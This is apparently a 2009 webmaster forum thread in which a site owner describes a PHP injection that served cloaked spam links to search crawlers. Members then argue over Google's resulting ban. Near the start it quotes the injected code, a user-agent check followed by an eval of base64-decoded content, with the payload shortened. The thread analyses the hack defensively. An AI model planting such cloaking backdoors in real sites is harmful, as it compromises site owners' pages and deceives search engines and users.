Forum Moderators: Robert Charlton & goodroi
Checked PHP files and could not find those links (you need to use Googlebot useragent), but after careful investigation it was determined that clever PHP injection was made into one of the files included from index.php with datestamp kept intact.
Here is the PHP:
if(strstr($_SERVER['HTTP_USER_AGENT'], 'Mybot') ¦¦ strstr($_SERVER['HTTP_USER_AGENT'], 'Googlebot') ¦¦ strstr($_SERVER['HTTP_USER_AGENT'], 'msn')¦¦ strstr($_SERVER['HTTP_USER_AGENT'], 'Slurp')) {
eval(base64_decode('ZnVuY3Rpb24...QoKTsK'));
}
If decoded it shows up that the spam links are taken from external URL that I won't post here (you can decode).
Now what's really odd is that Google just banned whole site because of these clearly hacked links - it seems rather harsh reaction given that they are well aware that such hacks are common place now, it seems more reasonable more would have been to warn user and devalue outgoing links.
[edited by: tedster at 7:56 pm (utc) on Jan. 9, 2009]
[edit reason] obscure the spammer link code [/edit]
This attitude will end them in court sooner rather than later and they will lose.
Wasn't there a company that sued Google for banning them because of their black hat practice and lost? It seems there's a precedent that Google doesn't owe anyone being listed or well ranked, especially if they apply their logic (banning on cloaking detection) to everyone without discrimination. You assume Google knows it's not your fault. How can they know it's not deliberate cloaking? And should they, really? Just like ignorance of the law is never a defense, sometimes irresponsibility is just as bad as malice and must be treated the same. Either way, in the end, Google is a private company, not the government, they're allowed a lot more leeway with regards to how they conduct their business.
Wasn't there a company that sued Google for banning them because of their black hat practice and lost?
Yes but that was very different case - they would not be able to prove in court that their site was hacked where as in my case I would have been able to do so easily, this means that it is a completely different ballpark.
Also bear in mind that right now Google is much more powerful than it used to be back then - in the UK around 90% of searches are done on Google, this effectively means they are a monopoly here - they may well be private company but they can't abuse their monopolistic status, which in my view they do with such unjustified bans.
For me this just shows how bad it is to have monopolies - hackers in my view have less potential to destroy online business than Google, and that's ain't right.
Say they had detected one instance of hacking (cloaked links for e.g.) but had not detected a drive-by download. They served the page despite the fact it was hacked because they made a judgement that it would not maliciously affect the searcher. Thousands of people get hit. Further, how much resource would it take to verify every hacked site is in fact clean? How often would you have to spider to be happy it remained clean?
No, I think once a hack is detected, Google must assume the worst and de-list until the owner has rectified the problem.
Communicating the fact of de-listing via WMT would be helpful, and may even constitute a duty of care given the fact that for many, Google referals are the life-blood of their company.
I get that you're upset about your site being out of action for a day, but here's how I see it
your neighbour(Google) sees someone trying to climb in through your window, and call the police (ban you) turns out it's your son who has forgotten his keys (not actually dangerous but could have been) you have to go and get your son out of jail (submit re-inclusion request etc) do you stand and scream and shout at your neighbour because they *should* have realised that it was your son, or do you thank them profusely for their vigilance, and hope that they do the same next time as it could prevent you from being robbed (your customers getting a malware and no longer being customers) in the future.
Yes this time there was no risk to your site users, but why should Google take that risk, surely it's better to ban *all* hacked sites then risk one malware ridden one getting through?
I think G would be open to more lawsuits if they served results from domains they knew to be hacked.
Please double check my words - in my case here the site was hacked for invisible cloaked links designed to boost ranking. Users never saw them, which is why I only noticed it when user told me that site appears to be banned in Google.
so how long do you think Google shoukld have left your site out there, before they banned it
I think they should not ban sites for such links at all - perhaps devalue outgoing links and send message to the site owner. I repeat yet again - hacked site does not mean it causes issues to the end users who may visit it - in this case the only side that was bothered is Google as such hidden links cause problems for link based ranking.
It may be speculated that if site is hacked in this way then it will be hacked next time to distribute malicious software that may engander end users. Indeed, it can also be speculated that some minor criminal can turn into murderer and thus should be locked up for life straight away: this does not happen in real world because there are laws that demand proportionality. Google is completely out of order here as their actions completely disproportional.
Think about it - for years it has been speculated that backlinks from back neighbourhoods could be bad for you: search engines did not want to ban sites outright because that would have lead to intentional black hat action to hurt competitors. Now we know for fact that Google can ban site if a handful of outgoing links will be put on it due to hacks that going on all the time. If they act like this then surely this will become great black hat attack on competition especially if they are not big sites who can afford good security? Think about it - by defending Google in this case you are exposing yourself to such action in the future. And don't think your will have perfect security - nobody does.
I credit Google with unbanning site quickly however. What they should have done was to devalue links, warn via email and maybe give 30 days to fix. If site was totally new then ban outright but established sites known to be good should not be treated like they did.
Oh, just noticed it's a homepage feature discussion, my first! :)
Didn't intend to appear bitter in this thread - luckily my traffic is heavily diversified and search engines don't actually play important role, however it is embarassing to be out of index where everyone expects you to be.
[edited by: Lord_Majestic at 2:35 pm (utc) on Jan. 19, 2009]
How does Google know FOR SURE that there wasn't another hack there that went undetected?
How much resource should they devote to verifying that the hack was for SEO and not malicious?
How much resource should they devote to checking against a known list of hacks that ARE malicious?
Should they develop an inhouse list of vunerabilities? Or pay a AV company? Would it be licensed? Per search, per server, per server farm?
Say the site is on a 1 week spider schedule. Should G be confident no additional defacements or malware gets executed between spiders?
Right, hypothetical time.
Google has used thousands or perhaps millions of dollars checking sites that have been hacked, but as far as the latest definitions say, users should be fine. But wait, an unknown exploit gets through. Someone sues. Google admits the KNOW the site is hacked, that they COULD de-list, but made a NEGLIGENT JUDGEMENT to serve the page anyway.
Think how quickly you acted once you knew you were dropped. Many would do the same. Many of those would NOT act so quickly if they were not taking the hit. They would have no incentive.
So fine, in your case the result was disproportionate. However, I contend that the resources required to ascertain proportionality are disproportionate to their duty of care to you.
Added- However, I think posting a note in WMT is something that should be actioned as part of an implied Duty of Care
[edited by: Shaddows at 3:13 pm (utc) on Jan. 19, 2009]
How does Google know FOR SURE that there wasn't another hack there that went undetected?
It doesn't so it should not ban it.
In my view it is not their job to police these things - it is a matter for the users, AV companies, hosting providers: Google should probably mark site as potentially dangerous like they do now for those of them that they are sure to be infected.
Google admits the KNOW the site is hacked, that they COULD de-list, but made a NEGLIGENT JUDGEMENT to serve the page anyway.
Grrr, how many times should I repeat that this hack is harmless for the end users? The hack was to put cloaked (not shown to normal users) links - Google's detection message was very explicit - cloaked links, so end users were never in danger at any time. It can be speculated that since one hack is possible then other one may have put infected stuff on computers, so what.
However, I contend that the resources required to ascertain proportionality are disproportionate to their duty of care to you.
They have no duty of care to speak of - they essentially (like any other site) disclaim any responsibility for the search results they show.
This thread is not about protection of users - this is about protection of link graph algorithms used by Google: they are being very harsh about it now (ban rather than devalued links), and I think they are making a mistake that will be very costly to them in the end but probably fatal to those who get hit by them until finally courts rule on this matter.
I would say that this thread points out the need for anyone that maintains a site dependent upon Google traffic to have a Google Webmaster Tools account and check the message center there daily.
I am in full agreement with that!
I think soon more people start doing that and Google will start warning first, that would be smarter thing for them to do than what they do now. Perhaps with such bans they want to drive faster adoption of GWT?
I was wondering, was that a solicited message
No.
The exact chronology is this:
1) I am alerted to the fact that site: command in Google does not show any pages for my site
2) I check GWT where I had that site verified long time ago - it's missing for some reason (maybe I deleted it but not sure)
3)I re-verify it and after that suddenly see message from Google telling me about temporary removal and giving details (which were handy): cloaked links with sample anchor text they found
4) I investigate and find this clever hack that was cloaking
5) Fix things and ask for reinclusion - this gave new message saying they received request
6) Site comes back in 2 business days, no additional messages.
The first message was not a warning - datestamp was the same as when site was removed.
So, one should check GWT often and register sites there, I think perhaps that's what Google wants to push people for with these strong arm tactics.
it seems more reasonable more would have been to warn user and devalue outgoing links.
I'm ignorant..How would they do it? Does Google maintain such an email database of webmasters?
For webmasters, they should post a message through Google Webmaster Tools, and possibly send an email to the address registered on that account.
Finally, to stop the hack being beneficial to the hacker, the cloaked links become (effectively) nofollowed.
So, for the 3 parties affected by the hack, the outcome would be
Webmaster - no adverse effect, but warned of compromise
User (searcher) - Warned of hack but still able to find page
Hacker - No positive effect whatsoever (apart from possible notoriety)
I believe his is Lord Majestic's preferred solution.
I agree in principle, except that I think the check for malicious activity is too onerous and therefore it is acceptable to drop the domain. I can see it both ways however, and am happy to disagree.
[edited by: Shaddows at 2:09 pm (utc) on Jan. 20, 2009]
I am currently working on a "paper" map of all the input points to my site, where users can upload content. These are your weak points. Then I will double check that I am safe from SQL injections there, but also double check that your safe from HTML injections (spamming) and file injections (you don't want them to somehow upload a whole new page).
I just tried the lynx command, it is pretty neat.
I believe his is Lord Majestic's preferred solution.
Yes I agree, that would be best solution that won't cause more harm than necessary.
Majestic, why are you arguing so much.
I am not argueing - I am expressing my views.
No software is perfect - it is unreasonable for Google to place such high burden on every only because such hacked links cause problems to their PageRank calculations: they managed to detect that it was cloaked and also hidden from user view, so they should quietly devalue such links.
lets discuss how to prevents these hackers from getting to us.
I operate on the basis that perfect security is simply not possible without very high costs - if you use popular forum or blog software you will be exposing yourself to such issues and everyone got holes, it's just a matter of time.
So, given that assertion I conclude that any action that will makes things much worse than they are (like site ban in Google) is not acceptable given their monopolistic position. You are entitled to disagree with my view, just be aware that by giving support to such Google's policy you are increasing chance that you will be on the sharp end sooner or later.